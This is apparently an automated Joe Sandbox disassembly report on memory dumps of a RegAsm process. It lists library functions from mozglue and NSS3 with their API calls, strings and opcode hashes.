Opcode Fuzzy Hash: 39ae2a1616c4223dbff9fb8a0beb143ba064d8b86780fdf69e7827f3eec79750
Instruction Fuzzy Hash: 681127B1716600DFEB208F18D948A6677B8EB5630DF28813DD809C7B41E771E918CBB1

Function 6C751FA0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C77AB89: EnterCriticalSection.KERNEL32(6C7CE370,?,?,?,6C7434DE,6C7CF6CC,?,?,?,?,?,?,?,6C743284), ref: 6C77AB94
Part of subcall function 6C77AB89: LeaveCriticalSection.KERNEL32(6C7CE370,?,6C7434DE,6C7CF6CC,?,?,?,?,?,?,?,6C743284,?,?,6C7656F6), ref: 6C77ABD1

LoadLibraryW.KERNEL32(combase.dll,?), ref: 6C751FDE
GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6C751FFD
__Init_thread_footer.LIBCMT ref: 6C752011
FreeLibrary.KERNEL32 ref: 6C752059

Strings

combase.dll, xrefs: 6C751FD9
CoCreateInstance, xrefs: 6C751FF7

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoCreateInstance$combase.dll
API String ID: 4190559335-2197658831
Opcode ID: a03523afe615838427b2488c73f13375e877ba2e6bcfd25312a98bb047c0bf51
Instruction ID: 40ee1975c790f07ac412dae5e67fb5ae70c92a209e78651f500930f114096177
Opcode Fuzzy Hash: a03523afe615838427b2488c73f13375e877ba2e6bcfd25312a98bb047c0bf51
Instruction Fuzzy Hash: 35114F7570120AAFEF20EF15DE4DE563F79EB46365F104039FE0992650DB31AA50CBA1

Function 6C750EE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C77AB89: EnterCriticalSection.KERNEL32(6C7CE370,?,?,?,6C7434DE,6C7CF6CC,?,?,?,?,?,?,?,6C743284), ref: 6C77AB94
Part of subcall function 6C77AB89: LeaveCriticalSection.KERNEL32(6C7CE370,?,6C7434DE,6C7CF6CC,?,?,?,?,?,?,?,6C743284,?,?,6C7656F6), ref: 6C77ABD1

LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C77D9F0,00000000), ref: 6C750F1D
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C750F3C
__Init_thread_footer.LIBCMT ref: 6C750F50
FreeLibrary.KERNEL32(?,6C77D9F0,00000000), ref: 6C750F86

Strings

CoInitializeEx, xrefs: 6C750F36
combase.dll, xrefs: 6C750F18

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoInitializeEx$combase.dll
API String ID: 4190559335-2063391169
Opcode ID: a3847f6911e79603cce90c80ff0840fd518f8e6faca75a852fe398acb9c15018
Instruction ID: cbb9cd6d163cf97b55db80abcacda6af9d86aa153cf80963ad001e947ddc4c52
Opcode Fuzzy Hash: a3847f6911e79603cce90c80ff0840fd518f8e6faca75a852fe398acb9c15018
Instruction Fuzzy Hash: A41170757052429FDF00CF64EE08E4A3778FB4A72AF404239FA05D2680DB31A615CA65

Function 6C7562E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C77AB89: EnterCriticalSection.KERNEL32(6C7CE370,?,?,?,6C7434DE,6C7CF6CC,?,?,?,?,?,?,?,6C743284), ref: 6C77AB94
Part of subcall function 6C77AB89: LeaveCriticalSection.KERNEL32(6C7CE370,?,6C7434DE,6C7CF6CC,?,?,?,?,?,?,?,6C743284,?,?,6C7656F6), ref: 6C77ABD1

LoadLibraryW.KERNEL32(combase.dll), ref: 6C75631B
GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 6C75633A
__Init_thread_footer.LIBCMT ref: 6C75634E
FreeLibrary.KERNEL32 ref: 6C756376

Strings

combase.dll, xrefs: 6C756316
CoUninitialize, xrefs: 6C756334

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoUninitialize$combase.dll
API String ID: 4190559335-3846590027
Opcode ID: 516f4a99d90c6a3ff6afee44fc85f24e5677c454427eaf64a8793ea15a98233c
Instruction ID: fb2d97c1075c61acfa089fdd2f09ece1a947508c14612492b26d38b5010fcba9
Opcode Fuzzy Hash: 516f4a99d90c6a3ff6afee44fc85f24e5677c454427eaf64a8793ea15a98233c
Instruction Fuzzy Hash: DE010C75705607CFEF10CF28EA48B5477B4B706715F144539EA01C2B90EB30A759CE55

Function 6C78F540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C78945E
Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789470
Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789482
Part of subcall function 6C789420: __Init_thread_footer.LIBCMT ref: 6C78949F

GetCurrentThreadId.KERNEL32 ref: 6C78F559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C78F561

Part of subcall function 6C7894D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7894EE
Part of subcall function 6C7894D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C789508

GetCurrentThreadId.KERNEL32 ref: 6C78F577
AcquireSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78F585
ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78F5A3

Strings

[I %d/%d] profiler_resume_sampling, xrefs: 6C78F499
[I %d/%d] profiler_pause_sampling, xrefs: 6C78F3A8
[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C78F56A
[I %d/%d] profiler_resume, xrefs: 6C78F239

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 2848912005-2840072211
Opcode ID: 4d756d7b586fb7cef3ebc328a06e01d6cbfc5f912773102675c2d21d84a2005f
Instruction ID: d84e05f63a72de7a68e8d34bbf0d1c838d4e2629b7378d504d66db9bbf957e2d
Opcode Fuzzy Hash: 4d756d7b586fb7cef3ebc328a06e01d6cbfc5f912773102675c2d21d84a2005f
Instruction Fuzzy Hash: 72F0E9767012029FDB006FB4D84C99A777CEB8675DF000031FB1683702CB35AB008B61

Function 6C750E40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernel32.dll,6C750DF8), ref: 6C750E82
GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C750EA1
__Init_thread_footer.LIBCMT ref: 6C750EB5
FreeLibrary.KERNEL32 ref: 6C750EC5

Strings

GetProcessMitigationPolicy, xrefs: 6C750E9B
kernel32.dll, xrefs: 6C750E7D

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeInit_thread_footerLoadProc
String ID: GetProcessMitigationPolicy$kernel32.dll
API String ID: 391052410-1680159014
Opcode ID: 9bdd0575eedd66d8ed00accdfdf2d3a5ca26268402743d7c9d094cbc73bcd2aa
Instruction ID: 81754a95e3896a4f36676f252cd2cf3fb3bc3f065b18d9caa95ee4014aa7a003
Opcode Fuzzy Hash: 9bdd0575eedd66d8ed00accdfdf2d3a5ca26268402743d7c9d094cbc73bcd2aa
Instruction Fuzzy Hash: 5B014B74700A878FEF009FB8DA18A4237B9E706718FA00635E90182B40DB34BA349A52

Function 6C78F600 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C78945E
Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789470
Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789482
Part of subcall function 6C789420: __Init_thread_footer.LIBCMT ref: 6C78949F

GetCurrentThreadId.KERNEL32 ref: 6C78F619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C78F598), ref: 6C78F621

Part of subcall function 6C7894D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7894EE
Part of subcall function 6C7894D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C789508

GetCurrentThreadId.KERNEL32 ref: 6C78F637
AcquireSRWLockExclusive.KERNEL32(6C7CF4B8,?,?,00000000,?,6C78F598), ref: 6C78F645
ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8,?,?,00000000,?,6C78F598), ref: 6C78F663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C78F62A

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 2848912005-753366533
Opcode ID: c0a64c0f5ccd4f0198f59d9b6b927dce5052a7738dfe2baac4b570a55e31d715
Instruction ID: eaf532b879580aab57b1b36c0342254a643f6ac7034954c7fccc638c70275fdb
Opcode Fuzzy Hash: c0a64c0f5ccd4f0198f59d9b6b927dce5052a7738dfe2baac4b570a55e31d715
Instruction Fuzzy Hash: A4F08976301206AFDB006BB5C94C99A777DEB8676DF000435FB1683742CB796E058B75

Function 6C7805F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C77CFAE,?,?,?,6C7431A7), ref: 6C7805FB
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C77CFAE,?,?,?,6C7431A7), ref: 6C780616
strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C7431A7), ref: 6C78061C
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C7431A7), ref: 6C780627

Strings

<jemalloc>, xrefs: 6C7805FA, 6C78060F
: (malloc) Error in VirtualFree(), xrefs: 6C78061B, 6C780625

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: _writestrlen
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2723441310-2186867486
Opcode ID: 5f98d413895a1663098a662694d9b5a3edbffc8f65790f8c770330660f1b922b
Instruction ID: 40a5621737ba305f3fd8ad9be7a2a577a1a9f82f00a7eb12bfe9254f1b477853
Opcode Fuzzy Hash: 5f98d413895a1663098a662694d9b5a3edbffc8f65790f8c770330660f1b922b
Instruction Fuzzy Hash: 4BE08CE2A010103BF5142256AC8ADBB761CDBC6134F080039FD0D93301E95ABD1A51F7

Function 6C799240 Relevance: 9.3, APIs: 6, Instructions: 289timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C799BAE
free.MOZGLUE(?,?), ref: 6C799BC3
free.MOZGLUE(?,?), ref: 6C799BD9

Part of subcall function 6C7993B0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C7994C8
Part of subcall function 6C7993B0: free.MOZGLUE(6C799281,?), ref: 6C7994DD

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: c82a917cb108f4104b59a367577b0d880f03fd07611b0e3165b9f11e9aaba172
Instruction ID: 34ea1eecc9d760d1c942d9b1311a421040059d662b8975e00c0b662439242bed
Opcode Fuzzy Hash: c82a917cb108f4104b59a367577b0d880f03fd07611b0e3165b9f11e9aaba172
Instruction Fuzzy Hash: BBB1DF31A047048FDB01CF69D9845AEF3F5FFD9328B148629E8599B741EB30E946CB91

Function 6C7505F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e820b76711ee5f5b477fd2f920a359b53b605ed20deb9eef423a21c2ea8eda71
Instruction ID: 72c227c76bfc56a19aa46247a16c05f19e73e5412f4a8d6212fd6ed9efc1c6b4
Opcode Fuzzy Hash: e820b76711ee5f5b477fd2f920a359b53b605ed20deb9eef423a21c2ea8eda71
Instruction Fuzzy Hash: 23A14BB0A006458FDB14CF29CA94A99FBF1FF48308F44866ED44A97B40EB30BA55CF90

Function 6C7871A0 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 212COMMON

Download Yara Rule

APIs

Part of subcall function 6C786060: moz_xmalloc.MOZGLUE(00000024,3B739DB0,?,?,?,?,?,6C78712F), ref: 6C786078

free.MOZGLUE(-00000001), ref: 6C7872F6
free.MOZGLUE(?), ref: 6C787311

Strings

333s, xrefs: 6C787226
Spliced unique strings, xrefs: 6C787340
333s, xrefs: 6C78731B
Copied unique strings, xrefs: 6C787320

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: free$moz_xmalloc
String ID: 333s$333s$Copied unique strings$Spliced unique strings
API String ID: 3009372454-760240034
Opcode ID: 57dfda23933b44c72d4fd4c466463aa0fc2729c7f1a83138c981f37743717ebb
Instruction ID: 87ef3d491724f24fc69be6b45b41d9771029f1fee60d39e84f52fc96e23c744c
Opcode Fuzzy Hash: 57dfda23933b44c72d4fd4c466463aa0fc2729c7f1a83138c981f37743717ebb
Instruction Fuzzy Hash: DE71B371F012198FCB04CF69C99469DB7F2AF94304F258139E91AABB50DB31A946CB81

Function 6C7A14A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C7A14C5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C7A14E2
GetCurrentThreadId.KERNEL32 ref: 6C7A1546
InitializeConditionVariable.KERNEL32(?), ref: 6C7A15BA
free.MOZGLUE(?), ref: 6C7A16B4

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
String ID:
API String ID: 1909280232-0
Opcode ID: 036b175dfd67937731d9de0699dd48faf6228dfb2ab6fad31e0d4fe10f741eab
Instruction ID: 1f82b4ad91e50efabf5cd3a544ee7738662eb2d8a320c7f98c51d4481f93a67a
Opcode Fuzzy Hash: 036b175dfd67937731d9de0699dd48faf6228dfb2ab6fad31e0d4fe10f741eab
Instruction Fuzzy Hash: 1261DF71A00704DFDB118F65D988BDA77B4BF89308F04962CED8A57611DB31E945CB91

Function 6C79C160 Relevance: 9.2, APIs: 6, Instructions: 174COMMON

Download Yara Rule

APIs

fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C79C1F1
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C79C293
fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C79C29E

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: fgetc$memcpy
String ID:
API String ID: 1522623862-0
Opcode ID: dd96de1fdb3b990c9dc5506e5636ad299f14c6b107d32dad2043f102babbc3d4
Instruction ID: e5b3875529f73abbed1f6094ffb087cab657f3ad71790d7355cc2d21f759532c
Opcode Fuzzy Hash: dd96de1fdb3b990c9dc5506e5636ad299f14c6b107d32dad2043f102babbc3d4
Instruction Fuzzy Hash: 0561BE71A00218CFCF14DFA8E9849AEBBB5FF49316F154529E802B7751C731A944CFA1

Function 6C8CCCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C8CC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C8CDAE2,?), ref: 6C8CC6C2

PR_Now.NSS3 ref: 6C8CCD35

Part of subcall function 6C929DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C970A27), ref: 6C929DC6
Part of subcall function 6C929DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C970A27), ref: 6C929DD1
Part of subcall function 6C929DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C929DED

Part of subcall function 6C8B6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C861C6F,00000000,00000004,?,?), ref: 6C8B6C3F

PR_GetCurrentThread.NSS3 ref: 6C8CCD54

Part of subcall function 6C929BF0: TlsGetValue.KERNEL32(?,?,?,6C970A75), ref: 6C929C07

Part of subcall function 6C8B7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C861CCC,00000000,00000000,?,?), ref: 6C8B729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C8CCD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C8CCE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C8CCE2C

Part of subcall function 6C8C10C0: TlsGetValue.KERNEL32(?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C10F3
Part of subcall function 6C8C10C0: EnterCriticalSection.KERNEL32(?,?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C110C
Part of subcall function 6C8C10C0: PL_ArenaAllocate.NSS3(?,?,?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C1141
Part of subcall function 6C8C10C0: PR_Unlock.NSS3(?,?,?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C1182
Part of subcall function 6C8C10C0: TlsGetValue.KERNEL32(?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6C8CCE40

Part of subcall function 6C8C14C0: TlsGetValue.KERNEL32 ref: 6C8C14E0
Part of subcall function 6C8C14C0: EnterCriticalSection.KERNEL32 ref: 6C8C14F5
Part of subcall function 6C8C14C0: PR_Unlock.NSS3 ref: 6C8C150D

Part of subcall function 6C8CCEE0: PORT_ArenaMark_Util.NSS3(?,6C8CCD93,?), ref: 6C8CCEEE
Part of subcall function 6C8CCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C8CCD93,?), ref: 6C8CCEFC
Part of subcall function 6C8CCEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C8CCD93,?), ref: 6C8CCF0B
Part of subcall function 6C8CCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C8CCD93,?), ref: 6C8CCF1D

Part of subcall function 6C8CCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C8CCD93,?), ref: 6C8CCF47
Part of subcall function 6C8CCEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C8CCD93,?), ref: 6C8CCF67
Part of subcall function 6C8CCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C8CCD93,?,?,?,?,?,?,?,?,?,?,?,6C8CCD93,?), ref: 6C8CCF78

Memory Dump Source

Source File: 00000003.00000002.2272879099.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true

Associated: 00000003.00000002.2271733381.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2291783107.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292436423.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292519358.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292589475.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292635391.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c7e0000_RegAsm.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID:
API String ID: 3748922049-0
Opcode ID: 47f75c3057241f6bceb179a30a2e57ca301c8b64dcaa8f0bf249a72781e75ebd
Instruction ID: 3f508c29452512f795988125f2a8e02b8932562e34dacde7bad266f2e0de4de8
Opcode Fuzzy Hash: 47f75c3057241f6bceb179a30a2e57ca301c8b64dcaa8f0bf249a72781e75ebd
Instruction Fuzzy Hash: B451B3B6B001049BE720DF69DE40B9A77F4AF49348F250938D955A7B42EB31E905CB92

Function 6C799F40 Relevance: 9.2, APIs: 6, Instructions: 157timeCOMMON

Download Yara Rule

APIs

